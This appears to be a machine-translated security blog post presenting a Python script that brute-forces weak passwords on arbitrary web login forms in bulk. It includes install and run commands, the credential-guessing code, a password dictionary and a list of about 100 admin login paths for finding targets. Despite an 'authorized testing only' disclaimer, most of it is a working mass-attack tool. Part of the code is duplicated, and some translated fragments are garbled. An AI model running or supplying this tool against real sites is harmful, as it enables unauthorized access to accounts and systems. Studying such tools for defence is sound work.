Original Epee without front Tide security team
Tidesec @ new information
Escort for network security
2000- to date
Sheng Ming
This article was first published in freebuf tidesec column by "sword without front", a member of tide security team:
https://www.freebuf.com/sectool/200345.html
The technologies, ideas and tools involved in this article are only for learning and exchange for safety purposes, and no one is allowed to use them for illegal purposes and profit purposes, or the consequences will be borne by themselves!
Note: this script only discusses the feasibility of cracking the general web password. For all tests, please build the target environment by yourself or carry out the test after obtaining the relevant authorization of the target system. The technology, ideas and tools involved in this paper are only for the purpose of safety learning and exchange, and no one can use them for illegal purposes and profit purposes, or the consequences will be borne by themselves!
Tool introduction
Sometimes in the work, we need to quickly test the background security of some websites in large quantities, especially test some weak passwords. This kind of work, which is not difficult but time-consuming and laborious, needs an automatic script to complete. However, most of the current web password cracking tools are designed for a CMS, or similar to burpsuite, which needs to be manually configured. We have never seen a general cracking tool.
So we have this small tool - the general web weak password cracking script. With another information collection tool, https://github.com/tidesec/fuzzscanner, we can perform batch fast swiping.
Installation and use
Installation and use are relatively simple:
Drag it off GitHub
git clone https://github.com/TideSec/web_pwd_common_crack
Install requirements.txt dependency
pip install -r requirements.txt
Just run the script
python web_pwd_crack.py url.txt 50 --> url.txt为待扫描URL地址列表,50为线程数,默认为50
Url.txt is the URL address to be detected. You can write a script to get it from the search engine in batches, or you can use directory enumeration tool to collect it.
Functional principle
1. Access to target address, analyze keywords
The principle is very low, which is to extract the form from the page and retrieve the contents of the form. It is found that there are user name, password, username, PWD, pass and other fields, which are considered as the login page. Then the parameters are extracted to form data data and sent to the crack function for cracking.
Due to the diversity of request packages of various websites, it is impossible to extract all login posts like WVS at present, only based on simple keywords.
logins =['用户名','密码','login','denglu','登录','user','pass','yonghu','mima','pwd','zhanghao','yonghu','name','email','account']
It is also found in the test that sometimes the search box will interfere with the results, so the search box is excluded again
sous = ['检索','搜','search','查找','keyword','关键字']
In addition, automatic identification of verification code is not supported at present, so the verification code is also excluded
yzms = ['验证码','点击更换','点击刷新','checkcode','valicode','code','captcha']
2. Get the post address and parameters by parsing the page
def get_post_get_page(content,url):
form_action = str(content).split('\n')[0]
soup = BS(form_action, "lxml")
url_path = ''
for x in re.findall(".*?/",url):
url_path = url_path+x action_url = soup.form['action']
if str(action_url).startswith('http'):
path = action_url
else:
path = url_path+soup.form['action']
method = soup.form['method']
return path,method
def web_crack(method,path,data):
conn = requests.session()
res0 = conn.get(path, headers=requests_headers(), allow_redirects=False,timeout=10,proxies = requests_proxies())
error_length,cookie_error_flag,dynamic_req_len = get_error_length(conn,method,path,data)
if dynamic_req_len:
return False,False num = 0
success_flag = 0
dic_all = len(USERNAME_DIC)*len(PASSWORD_DIC)
for user_name in USERNAME_DIC:
for pass_word in PASSWORD_DIC:
data1 = data
user_name = user_name.strip()
pass_word = pass_word.strip()
pass_word = str(pass_word.replace('{user}', user_name))
data2 = str(data1.replace('%7Buser_name%7D', user_name))
data2 = str(data2.replace('%7Bpass_word%7D', pass_word))
num = num+1
res = conn.post(url = path,data = data2, headers=requests_headers(), timeout=10,verify=False,allow_redirects=False,proxies = requests_proxies())
cur_length = len(res.content+str(res.headers))
if cookie_error_flag:
if cur_length!=error_length:
success_flag =1
return user_name,pass_word
elif 'Set-Cookie' in res.headers and cur_length!=error_length:
success_flag =1
return user_name,pass_word
if success_flag == 0:
return False,False
num = 0 success_flag = 0 dic_all = len(USERNAME_DIC)*len(PASSWORD_DIC)for user_name in USERNAME_DIC:for pass_word in PASSWORD_DIC: data1 = data user_name = user_name.strip() pass_word = pass_word.strip() pass_word = str(pass_word.replace('{user}', user_name)) data2 = str(data1.replace('%7Buser_name%7D', user_name)) data2 = str(data2.replace('%7Bpass_word%7D', pass_word)) num = num+1 res = conn.post(url = path,data = data2, headers=requests_headers(), timeout=10,verify=False,allow_redirects=False,proxies = requests_proxies()) cur_length = len(res.content+str(res.headers)) if cookie_error_flag: if cur_length!=error_length: success_flag =1return user_name,pass_wordelif 'Set-Cookie' in res.headers and cur_length!=error_length: success_flag =1return user_name,pass_wordif success_flag == 0:return False,False 配置了一个比较简单的字典
USERNAME_DIC = ['admin','guest','test','ceshi','system']
PASSWORD_DIC = ['123456','admin','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2018','{user}2017','{user}2016','{user}2015','{user}!','P@ssw0rd!!','qwa123','12345678','test','[email protected]#','123456789','123321','1314520','666666','woaini','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','a123456','p@ssw0rd','a123456789','woaini1314','qwerasdf','123456a','123456789a','987654321','[email protected]#$','5201314520', 'q123456', '123456abc', '123123123', '123456.','0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX','12345','1234567','passw0rd','admin888']
4. How to judge the success of cracking
At present, several methods are used to verify each other.
1、通过返回包里有没有Set-Cookie;
2、返回数据包的长度变化;
3、使用requests.session()进行重验证;
4、返回页面的内容匹配。
5. The accuracy is optimized by adding the recheck function
During the test, it was found that there would be false alarm, so the successful account password was re verified. For example:
1、有些系统在探测多次之后出现封ip之类的情况,这时候会干扰破解脚本的判断;
2、有些系统在开始的时候没有验证码,但错误几次后会出现验证码;
3、有些系统的提示信息会出现随机的变更,导致误报。
Work interface
The scanning process is as follows
The result of a successful scan will remain in the web crack ok.txt file
During the scanning, all logs such as verification code and phpMyAdmin will be saved in the web crack log.txt file. Later, you can screen one by one according to the log log.
Test conclusion
In fact, after the completion of this tool, I began to understand why there is no general crack on the market, because the success rate is indeed not high! I have tested 10000 management backstages (all self built!) , about 110 weak passwords are cracked. It is not clear if there is any false alarm but there is basically no false alarm.
The main reasons for the low success rate are:
1. It is difficult to get and submit the correct parameters because of the complexity of web page types;
2. Many pages have verification codes. At present, this little script can't automatically identify the verification codes
3. Some sites will be blocked by IP or account lock due to too high access frequency;
4. In order to balance time and efficiency, a relatively simple user name and password dictionary are used, so a slightly complex password cannot be cracked.
I usually use directory enumeration tools such as dirsearch to configure a lighter management background directory dictionary, scan the target address in batch, and then use web PWD crack.py to crack these background addresses in batch.
web_pwd_crack.py
Contribute a relatively simplified management background Dictionary (100)
admin/default/login.asp
admin/login.asp
admin/manage/login.asp
admin_login/login.asp
admincp/login.asp
administrator/login.asp
login.asp
manage/login.asp
manager/login.asp
member/login.asp
admin-login.php
admin/admin-login.php
admin/admin_login.php
admin/login.php
admin2/login.php
admin_area/login.php
admin_login.php
adminarea/login.php
admincontrol/login.php
administrator/login.php
administratorlogin.php
adminlogin.php
autologin.php
bb-admin/login.php
blog/wp-login.php
checklogin.php
login.php
modelsearch/login.php
moderator/login.php
nsw/admin/login.php
pages/admin/admin-login.php
panel-administracion/login.php
processlogin.php
rcjakar/admin/login.php
relogin.php
siteadmin/login.php
sqlbuddy/login.php
userlogin.php
usuarios/login.php
webadmin/login.php
wp-login.php
account/login.jsp
accounts/login.jsp
admin/login.jsp
auth/login.jsp
jsp/extension/login.jsp
login.jsp
member/login.jsp
members/login.jsp
portalAppAdmin/login.jsp
admin.jsp
netadmin.jsp
admin.php
admin.php3
admin/admin.php
admin_area/admin.php
adminarea/admin.php
authadmin.php
bb-admin/admin.php
checkadmin.php
cmsadmin.php
dbadmin.php
fileadmin.php
isadmin.php
linusadmin-phpinfo.php
memberadmin.php
moadmin.php
modelsearch/admin.php
moderator/admin.php
panel-administracion/admin.php
phpliteadmin.php
siteadmin.php
sysadmin.php
tmp/admin.php
ur-admin.php
user/admin.php
users/admin.php
webadmin.php
webadmin/admin.php
wp-content/plugins/akismet/admin.php
admin.asp
admin.aspx
admin/default/admin.asp
admin/manage/admin.asp
admin_login/admin.asp
administrator/admin.asp
article/admin/admin.asp
denglu/admin.asp
guanli/admin.asp
houtai/admin.asp
login/admin/admin.asp
manage/admin.asp
manager/admin.asp
member/admin.asp
admin/logon.jsp
admin/secure/logon.jsp
compass/logon.jsp
logon.jsp
logon/logon.jsp
ToDo
1. Add verification code identification
2. Reduce false alarm rate
3. Optimize web page coding
4. Code can be less low
E
N
D
G an
shut
Zh
notes
W
I
Men
People
Tide security team was formally established in January 2019. It is a security team under the banner of new information, aiming at the research of Internet attack and defense technology. At present, it has gathered more than ten professional security attack and defense technology researchers, focusing on network attack and defense, web security, mobile terminals, security development, IOT / Internet of things / industrial control security and other directions.
For more Tide security teams, please pay attention to team official website: http://www.TideSec.net or long by two-dimensional code, pay attention to official account number:
Trendy information
Professional focus excellence safety